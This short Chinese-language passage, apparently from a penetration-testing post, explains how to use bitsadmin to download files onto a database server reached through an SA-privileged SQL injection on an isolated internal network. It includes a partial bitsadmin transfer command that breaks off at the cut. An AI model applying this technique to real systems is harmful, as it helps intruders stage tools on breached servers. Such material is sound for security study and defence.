如果你碰到一个 Sa权限的注入点,你可以执行dos命令,但是你发现站库分离,数据库和web不在一个服务器上,而且悲剧的是数据库服务器又是个内网,这个时候你该怎么办? 这里就需要用到Bitsadmin来下载东西进去了,在windows08上测试成功了. 一个实例:https://xianzhi.aliyun.com/forum/topic/1654/ 1.bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/